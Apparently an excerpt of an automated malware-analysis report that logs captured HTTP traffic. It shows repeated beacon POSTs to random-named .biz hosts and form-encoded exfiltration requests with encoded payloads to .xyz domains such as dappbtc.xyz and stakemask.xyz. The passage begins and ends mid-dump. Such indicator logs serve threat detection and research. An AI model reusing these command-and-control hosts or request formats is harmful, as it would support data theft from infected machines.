4f 2f 6c 62 6f 48 6e 4b 55 44 57 67 2f 2b 6c 50 35 36 4f 35 44 45 32 33 56 62 52 6f 77 57 49 59 39 32 77 51 36 47 61 5a 6c 6f 42 44 6a 6a 4c 59 53 43 62 66 2f 36 33 30 67 5a 68 70 7a 6c 52 38 6b 52 2f 42 66 51 59 55 68 4c 31 37 49 78 48 2f 62 33 6b 74 6d 70 52 57 50 4a 64 4d 72 36 6f 4f 46 37 64 67 32 43 71 50 59 42 5a 46 4a 44 47 58 58 69 63 2b 57 4c 6f 66 32 47 63 49 34 62 63 50 43 64 70 36 74 73 66 63 78 2f 4a 34 4d 6b 4f 67 2f 38 41 43 74 57 7a 64 6a 4d 36 4c 57 65 39 34 46 35 33 4b 59 6a 4b 74 78 6e 65 35 65 59 43 53 63 58 39 39 30 52 49 6d 61 44 47 6b 6a 52 4e 33 6e 5a 74 66 37 34 49 6b 45 32 67 6d 37 6e 78 42 73 53 39 30 50 64 79 57 33 63 6c 6a 2f 64 50 36 4a 2b 79 6b 49 63 30 36 35 56 71 4b 35 77 43 6a 69 51 54 51 47 50 39 35 65 69 61 6f 52 63 76 71 33 38 56 53 52 33 2b 77 39 47 79 6b 42 57 52 53 6a 36 6b 75 42 2b 49 62 64 58 5a 6a 72 33 4c 56 74 49 56 65 48 45 7a 32 36 33 6e 57 58 6a 76 32 48 54 77 75 39 37 76 49 4b 39 68 78 63 34 43 75 73 47 42 47 35 2f 47 54 63 65 2f 74 4f 4f 6c 65 32 32 4e 33 30 51 4c 70 56 45 2b 42 33 56 30 78 66 56 2f 79 66 66 6c 79 53 73 65 51 49 31 47 6a 38 65 64 42 4c 49 73 7a 30 64 4a 67 6e 6d 64 59 56 63 2f 47 4e 55 6e 6c 4d 52 66 2b 5a 36 67 4a 76 68 72 69 55 4a 4a 57 58 74
Source: global traffic	HTTP traffic detected: POST /jbygjetolwm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /ngaqsknyip HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /jorfy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: GET /4udu/?lr9=2FpdhzjhhJt&SBX=QPOxO2JOSBeIkdRIJ7kHfEfpa4SAwF/WxXvhpqosjTHM3PFGv2TE4R55nnK/GVLmYbqeoCZ32Sz0NtXBeMrpNSAZ0hCamPuf4pMsJIkclL+7GyT0E55kVqE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dresses-executive.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
Source: global traffic	HTTP traffic detected: POST /lonlwvcifve HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /hllp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /btkthbssdabhgq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /ypmywomakylnkiti HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /7bzp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dappbtc.xyzOrigin: http://www.dappbtc.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.dappbtc.xyz/7bzp/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 58 54 53 32 65 48 58 4c 42 50 32 6f 6f 70 56 68 4e 30 5a 39 30 6e 75 2f 47 52 44 56 64 55 31 79 54 43 64 5a 4f 42 7a 4c 69 4b 30 32 6c 48 79 6f 30 55 78 70 49 6b 49 51 63 4b 6d 6a 68 55 56 32 43 44 65 54 42 41 34 30 30 6e 31 34 6f 46 5a 61 73 73 6e 2f 4b 66 2f 6c 46 5a 46 66 35 75 56 73 58 52 68 4c 4f 73 78 37 63 73 46 2f 6a 34 6b 58 52 73 63 6f 75 64 30 50 61 63 46 6b 67 7a 50 71 30 44 43 4a 30 70 32 67 41 55 78 62 44 4f 38 69 70 73 2b 59 54 6f 68 4d 45 66 61 36 53 41 4e 53 4e 6c 46 46 36 54 4f 4a 66 57 39 52 72 6e 43 48 47 44 39 74 71 58 74 45 67 77 4a 66 66 7a 77 50 41 41 3d 3d Data Ascii: SBX=XTS2eHXLBP2oopVhN0Z90nu/GRDVdU1yTCdZOBzLiK02lHyo0UxpIkIQcKmjhUV2CDeTBA400n14oFZassn/Kf/lFZFf5uVsXRhLOsx7csF/j4kXRscoud0PacFkgzPq0DCJ0p2gAUxbDO8ips+YTohMEfa6SANSNlFF6TOJfW9RrnCHGD9tqXtEgwJffzwPAA==
Source: global traffic	HTTP traffic detected: POST /7bzp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dappbtc.xyzOrigin: http://www.dappbtc.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.dappbtc.xyz/7bzp/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 58 54 53 32 65 48 58 4c 42 50 32 6f 71 49 6c 68 4d 54 31 39 79 48 75 67 59 42 44 56 55 30 31 2b 54 43 52 5a 4f 44 66 62 69 34 51 32 6c 69 4f 6f 31 56 78 70 50 6b 49 51 58 71 6d 71 38 6b 56 48 43 44 53 62 42 45 6b 30 30 6e 68 34 6f 41 39 61 73 62 7a 38 49 50 2f 6e 65 4a 46 64 6b 2b 56 73 58 52 68 4c 4f 6f 5a 52 63 73 64 2f 6a 4d 59 58 51 4e 63 76 6e 39 30 49 5a 63 46 6b 72 54 50 75 30 44 43 6e 30 72 53 4f 41 57 4a 62 44 50 4d 69 75 35 53 62 5a 6f 68 4b 41 66 62 4e 5a 31 6b 33 48 31 38 55 31 43 53 2b 56 33 41 77 71 68 50 64 58 79 63 36 34 58 4a 33 39 33 41 72 53 77 4e 47 62 4e 2f 58 63 79 4c 64 63 55 76 5a 6c 42 49 4e 78 4b 48 75 31 34 4d 3d Data Ascii: SBX=XTS2eHXLBP2oqIlhMT19yHugYBDVU01+TCRZODfbi4Q2liOo1VxpPkIQXqmq8kVHCDSbBEk00nh4oA9asbz8IP/neJFdk+VsXRhLOoZRcsd/jMYXQNcvn90IZcFkrTPu0DCn0rSOAWJbDPMiu5SbZohKAfbNZ1k3H18U1CS+V3AwqhPdXyc64XJ393ArSwNGbN/XcyLdcUvZlBINxKHu14M=
Source: global traffic	HTTP traffic detected: POST /7bzp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dappbtc.xyzOrigin: http://www.dappbtc.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.dappbtc.xyz/7bzp/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 58 54 53 32 65 48 58 4c 42 50 32 6f 71 49 6c 68 4d 54 31 39 79 48 75 67 59 42 44 56 55 30 31 2b 54 43 52 5a 4f 44 66 62 69 34 59 32 6c 51 32 6f 31 32 5a 70 4f 6b 49 51 65 4b 6d 6e 38 6b 56 65 43 48 32 66 42 45 6f 43 7a 56 6c 34 36 47 42 61 6c 65 66 38 57 50 2f 6e 4b 35 46 5a 79 4f 56 71 58 52 77 43 4f 73 78 52 63 73 68 2f 6a 4d 59 58 52 63 63 76 75 4e 30 4f 5a 63 46 4d 6b 7a 50 71 30 44 43 4a 30 70 2b 65 41 43 31 62 43 76 63 69 72 50 6d 62 56 6f 68 49 4e 2f 62 56 5a 31 67 36 48 32 4e 4e 31 44 4b 55 57 43 4d 77 71 45 53 53 56 44 55 79 73 6c 46 76 6b 58 4d 34 5a 54 31 35 58 36 37 32 62 33 48 52 44 47 48 48 2b 44 41 64 75 6f 2b 71 6e 2b 70 74 32 47 7a 6e 47 71 35 76 4a 66 71 65 6d 65 4e 6a 4f 69 71 66 30 48 47 4c 47 36 2f 5a 79 76 66 73 54 6f 74 77 6b 64 58 6f 6e 64 6e 55 76 6d 4a 49 62 6f 6a 43 73 52 50 58 44 2b 4f 71 47 6d 52 4d 71 70 53 35 62 6c 55 74 65 5a 51 5a 50 6c 46 54 56 49 38 6c 6f 6b 38 33 79 56 79 5a 31 4b 34 76 4f 66 6f 2f 79 52 67 34 55 7a 42 5a 46 77 5a 63 53 66 4b 54 77 6e 56 55 38 58 42 61 73 75 4d 77 4a 57 50 44 72 65 42 32 44 63 6e 43 6c 46 49 4b 76 4e 59 4f 7a 42 68 38 75 52 36 68 65 50 4e 4e 6d 58 57 4d 47 71 76 33 4a 33 65 78 38 56 6b 7a 48 78 62 6c 58 4e 44 6e 5a 42 44 4d 41 65 70 33 7a 73 48 68 71 2f 2f 50 4b 59 35 41 51 6f 50 4b 55 31 68 33 63 50 74 2f 34 51 38 6a 74 30 4d 59 65 71 42 4b 76 4d 76 6b 64 2f 34 71 77 73 73 54 4b 57 49 64 5a 54 74 43 34 33 68 4c 39 70 4d 49 77 68 36 43 4b 77 34 57 36 52 73 6e 77 47 56 6e 69 54 2b 66 53 5a 32 6e 38 52 51 32 50 62 65 4e 38 5a 45 73 32 4a 63 62 78 52 34 58 39 69 4b 36 34 76 38 66 46 2b 47 38 56 30 4c 34 70 46 70 63 2b 51 7a 59 4a 65 66 52 6c 32 49 51 72 6e 45 33 57 69 77 6d 62 6f 50 70 4a 2b 5a 37 78 52 76 53 55 35 4e 6a 31 37 47 42 33 2b 66 4b 45 72 5a 49 48 72 52 42 34 4d 6d 79 45 79 4b 70 7a 48 35 50 54 68 30 47 47 4b 41 63 34 32 68 62 76 77 4e 70 56 43 48 6d 70 75 4e 38 6d 45 6a 51 75 57 59 4b 67 63 63 6b 4e 46 77 67 54 70 38 61 50 56 43 39 6a 34 6d 35 63 61 6b 58 4b 50 7a 69 36 58 53 4d 34 68 79 58 4c 70 6d 79 67 67 6c 6f 6c 56 6f 79 67 30 42 4a 4b 64 6b 46 6b 66 56 73 2f 5a 5a 54 59 75 71 6b 45 71 73 63 6d 66 4a 61 5a 57 70 36 6e 67 5a 4b 72 44 34 79 57 56 4d 4b 68 31 5a 49 2b 44 36 6e 74 72 67 30 47 2b 47 48 66 57 46 55 42 6a 48 6f 69 37 74 35 2b 32 65 59 47 5a 64 50 33 42 42 31 4f 4e 6a 33 55 30 77 52 6d 79 51 48 78 75 72 63 30 72 45 6a 6a 69 53 79 4a 4b 68 71 45 44 74
Source: global traffic	HTTP traffic detected: GET /7bzp/?SBX=aR6WdwHaaPmew49IGl9c2CyrORGhdUxKRjpfDDDEmaIVpXDnsjMmJ0s7T5q7/mJAEyjBMk5h7mx5tXd7udb6EMTlIvch2q9+PHlpJuVOHss5uOhsYNovhdM=&lr9=2FpdhzjhhJt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dappbtc.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
Source: global traffic	HTTP traffic detected: POST /gwo6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.stakemask.xyzOrigin: http://www.stakemask.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.stakemask.xyz/gwo6/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 42 44 73 71 48 61 55 76 78 6f 41 37 4c 30 6d 38 4f 33 2b 74 62 7a 74 49 48 69 43 45 2b 6b 4b 63 35 36 51 47 75 4b 35 4f 38 35 64 59 6b 43 44 63 7a 31 47 31 74 36 4f 46 57 43 6e 66 73 6b 4c 4e 66 6c 6f 66 64 71 69 61 58 65 34 6d 2f 38 78 7a 7a 45 4b 68 45 34 4f 4d 46 33 44 4d 5a 6c 61 52 70 2f 49 41 41 59 6b 7a 6d 4e 59 35 56 6a 76 6c 34 74 64 48 46 4e 75 37 51 76 66 43 78 4d 65 61 4d 6c 54 64 39 34 7a 64 6a 44 35 47 44 58 77 47 68 73 39 34 79 4c 67 4b 38 79 62 4c 6a 78 53 42 2f 7a 64 66 77 45 58 37 41 38 30 6f 4e 36 36 54 48 49 4c 44 35 6c 2f 35 50 39 4a 6e 67 69 46 44 47 51 3d 3d Data Ascii: SBX=BDsqHaUvxoA7L0m8O3+tbztIHiCE+kKc56QGuK5O85dYkCDcz1G1t6OFWCnfskLNflofdqiaXe4m/8xzzEKhE4OMF3DMZlaRp/IAAYkzmNY5Vjvl4tdHFNu7QvfCxMeaMlTd94zdjD5GDXwGhs94yLgK8ybLjxSB/zdfwEX7A80oN66THILD5l/5P9JngiFDGQ==
Source: global traffic	HTTP traffic detected: POST /gwo6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.stakemask.xyzOrigin: http://www.stakemask.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.stakemask.xyz/gwo6/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 42 44 73 71 48 61 55 76 78 6f 41 37 4b 58 2b 38 4d 57 2b 74 54 7a 74 4c 49 43 43 45 33 45 4b 59 35 36 73 47 75 49 56 65 38 4e 78 59 6b 6a 54 63 68 68 71 31 73 36 4f 46 65 69 6e 51 79 55 4c 47 66 6c 55 39 64 71 65 61 58 66 63 6d 2f 2f 6c 7a 7a 33 69 2b 45 6f 4f 43 4a 58 44 4b 57 46 61 52 70 2f 49 41 41 62 59 4e 6d 4e 41 35 55 54 66 6c 37 4d 63 31 4d 74 75 38 47 2f 66 43 31 4d 65 65 4d 6c 54 6a 39 35 76 37 6a 42 42 47 44 54 30 47 68 65 46 33 38 4c 67 4d 79 53 61 62 73 43 69 4d 2f 69 6c 52 76 46 37 4d 42 66 34 57 4d 38 33 4a 57 35 71 55 72 6c 62 4b 53 36 41 54 74 68 34 4b 64 62 5a 78 69 50 54 7a 55 36 67 54 4e 6b 4d 32 4b 53 6e 58 50 66 4d 3d Data Ascii: SBX=BDsqHaUvxoA7KX+8MW+tTztLICCE3EKY56sGuIVe8NxYkjTchhq1s6OFeinQyULGflU9dqeaXfcm//lzz3i+EoOCJXDKWFaRp/IAAbYNmNA5UTfl7Mc1Mtu8G/fC1MeeMlTj95v7jBBGDT0GheF38LgMySabsCiM/ilRvF7MBf4WM83JW5qUrlbKS6ATth4KdbZxiPTzU6gTNkM2KSnXPfM=
Source: global traffic	HTTP traffic detected: POST /gwo6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.stakemask.xyzOrigin: http://www.stakemask.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.stakemask.xyz/gwo6/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 42 44 73 71 48 61 55 76 78 6f 41 37 4b 58 2b 38 4d 57 2b 74 54 7a 74 4c 49 43 43 45 33 45 4b 59 35 36 73 47 75 49 56 65 38 4e 35 59 6b 78 4c 63 7a 57 2b 31 76 36 4f 46 43 79 6e 54 79 55 4c 68 66 6c 4d 35 64 71 53 67 57 73 59 6d 35 38 42 7a 31 52 32 2b 4e 34 4f 43 59 6e 44 77 53 46 61 54 70 2f 5a 4a 41 59 6b 4e 6d 4e 63 35 55 54 66 6c 34 39 63 31 46 64 75 2b 47 2f 66 71 2b 73 65 61 4d 6c 54 64 39 34 61 67 6a 31 39 47 44 7a 6b 47 36 4e 39 33 30 4c 67 4f 78 53 62 65 73 43 75 50 2f 6a 4d 51 76 48 4c 6d 41 74 77 57 50 4a 47 31 4d 6f 57 31 70 57 2f 56 4d 62 6f 65 74 7a 67 58 62 37 74 4d 70 76 33 2f 57 72 45 68 48 55 68 67 66 44 50 48 5a 75 65 2f 5a 38 5a 43 6d 65 6f 61 70 4a 64 4c 47 50 4f 42 65 51 36 6f 35 36 42 59 55 61 5a 73 4a 33 55 78 63 75 6d 67 66 6e 65 41 2f 6d 2f 66 33 47 61 4e 47 74 4e 55 43 4e 76 6e 55 61 31 2b 73 4f 72 71 7a 46 48 6c 74 43 56 4c 6f 34 4c 45 4c 42 71 78 2b 43 38 43 37 74 61 69 49 50 37 56 6b 49 4c 67 46 4c 2b 6f 7a 6e 34 43 61 4b 53 61 37 7a 77 74 64 77 47 76 43 4c 4d 63 72 57 61 59 34 64 50 53 78 7a 59 56 79 45 79 7a 6a 79 73 55 77 50 7a 46 2b 6f 4e 56 6e 6c 35 34 72 6c 4c 6b 6a 30 61 62 64 59 30 6a 6f 57 70 48 76 54 6e 50 4e 6d 33 32 70 32 5a 4d 65 68 78 75 6c 63 46 57 34 72 61 6c 4c 57 57 55 76 57 74 44 6e 7a 75 64 64 38 68 2f 52 35 4e 2f 68 30 62 45 68 63 57 59 4e 74 6d 49 2f 31 44 64 30 2b 66 41 4f 76 57 45 63 47 53 64 6e 44 50 36 34 4c 72 38 35 74 47 4f 39 44 42 51 2b 47 50 30 33 72 74 6b 2f 48 74 63 45 30 52 43 39 43 56 64 4e 4a 71 35 45 31 46 50 74 41 46 2b 63 4f 6d 6f 63 45 41 62 6f 47 44 30 73 32 52 79 49 41 6e 64 70 68 68 69 55 64 41 6e 78 51 6d 76 49 43 53 53 56 76 4a 63 46 6e 72 69 50 42 33 36 75 59 49 76 77 45 41 5a 4b 2b 33 65 4c 75 37 71 67 77 62 31 56 32 73 77 6b 64 43 63 71 63 54 31 55 6c 4b 49 69 36 53 6f 6c 47 33 74 52 37 77 7a 32 57 53 43 4d 2f 70 4e 45 70 65 36 5a 31 75 73 65 4c 79 34 64 72 47 39 50 72 6b 64 45 55 55 44 45 45 62 49 52 30 7a 52 4d 69 62 36 52 30 35 32 58 78 54 76 54 2f 2b 58 45 74 48 79 50 71 79 74 44 74 75 32 59 36 36 5a 79 62 69 77 67 6e 52 61 4e 54 70 37 4b 73 76 50 6e 66 54 33 38 6a 46 67 42 35 47 59 33 44 5a 6b 72 48 42 46 48 2f 76 42 7a 48 4e 64 72 69 32 4e 4d 6e 77 78 76 67 4c 50 69 36 6e 6d 51 74 49 39 70 6c 41 79 53 4f 75 4e 34 77 36 57 51 69 6a 7a 55 50 37 43 6b 4a 5a 4e 44 52 49 46 70 61 2b 5a 34 69 52 42 32 78 6a 4c 59 73 78 55 49 53 46 47 62 4b 79 68 69 45 48 51 44
Source: global traffic	HTTP traffic detected: GET /gwo6/?SBX=MBEKEv0ugpgWX2jua16KbRtCIB3s6ka+zKgBsYRR8c9E1EzqhBu48/qzeTOQx3bSOlhdcb/rXf0aputkyH2GEaaTMgSCSx6h1rRpE7wz+fc0QC+fndBMDtU=&lr9=2FpdhzjhhJt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.stakemask.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
Source: global traffic	HTTP traffic detected: POST /uf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /bguu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.agistaking.xyzOrigin: http://www.agistaking.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.agistaking.xyz/bguu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 39 72 78 57 77 65 77 37 44 4b 2f 79 57 6a 65 51 53 33 68 33 6c 2f 4b 58 59 42 4b 30 58 4d 70 68 6f 35 5a 62 48 51 47 32 36 78 6a 4c 35 47 43 6f 73 71 77 2f 64 2b 41 54 59 76 64 72 4a 35 41 31 49 5a 42 56 42 44 58 4e 58 6c 79 7a 32 61 39 79 65 61 7a 42 33 4d 55 54 31 30 4c 59 66 6c 30 39 75 58 46 53 6d 70 4c 38 72 57 6a 51 38 58 70 67 4b 45 50 59 6f 66 66 47 65 74 32 74 74 32 6e 71 63 56 5a 59 44 42 5a 65 49 2f 30 33 62 6a 56 57 61 51 44 46 71 31 79 77 50 7a 31 64 41 56 6b 61 68 67 6a 52 4e 49 75 47 31 6e 59 6e 7a 4a 38 30 66 49 44 6f 72 53 35 32 45 61 4c 35 61 47 46 49 65 41 3d 3d Data Ascii: SBX=9rxWwew7DK/yWjeQS3h3l/KXYBK0XMpho5ZbHQG26xjL5GCosqw/d+ATYvdrJ5A1IZBVBDXNXlyz2a9yeazB3MUT10LYfl09uXFSmpL8rWjQ8XpgKEPYoffGet2tt2nqcVZYDBZeI/03bjVWaQDFq1ywPz1dAVkahgjRNIuG1nYnzJ80fIDorS52EaL5aGFIeA==
Source: global traffic	HTTP traffic detected: POST /bguu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.agistaking.xyzOrigin: http://www.agistaking.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.agistaking.xyz/bguu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 39 72 78 57 77 65 77 37 44 4b 2f 79 58 44 75 51 65 77 31 33 74 2f 4b 59 46 78 4b 30 63 73 70 6c 6f 35 46 62 48 54 4c 74 36 48 7a 4c 35 6a 2b 6f 32 6f 55 2f 4f 4f 41 54 4d 2f 63 41 48 5a 41 69 49 5a 64 64 42 47 33 4e 58 6c 32 7a 32 61 4e 79 64 74 50 43 78 4d 55 4e 75 45 4c 61 43 31 30 39 75 58 46 53 6d 70 76 53 72 57 37 51 39 6e 35 67 4c 68 76 62 67 2f 66 42 4b 39 32 74 70 32 6d 74 63 56 5a 36 44 44 68 77 49 39 4d 33 62 68 4e 57 62 42 44 47 7a 46 79 79 43 54 30 2b 4d 77 42 78 35 52 4b 6e 46 34 32 69 79 46 46 4c 37 76 78 75 4f 35 69 2f 35 53 64 46 5a 64 43 4e 58 46 34 42 46 48 58 77 6a 4d 6f 30 4a 76 7a 67 68 44 62 56 4c 4b 53 2b 76 49 59 3d Data Ascii: SBX=9rxWwew7DK/yXDuQew13t/KYFxK0csplo5FbHTLt6HzL5j+o2oU/OOATM/cAHZAiIZddBG3NXl2z2aNydtPCxMUNuELaC109uXFSmpvSrW7Q9n5gLhvbg/fBK92tp2mtcVZ6DDhwI9M3bhNWbBDGzFyyCT0+MwBx5RKnF42iyFFL7vxuO5i/5SdFZdCNXF4BFHXwjMo0JvzghDbVLKS+vIY=
Source: global traffic	HTTP traffic detected: POST /bguu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.agistaking.xyzOrigin: http://www.agistaking.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.agistaking.xyz/bguu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 39 72 78 57 77 65 77 37 44 4b 2f 79 58 44 75 51 65 77 31 33 74 2f 4b 59 46 78 4b 30 63 73 70 6c 6f 35 46 62 48 54 4c 74 36 48 37 4c 2b 52 6d 6f 31 49 6f 2f 4e 4f 41 54 50 2f 63 44 48 5a 41 61 49 5a 56 5a 42 47 79 36 51 56 61 7a 77 49 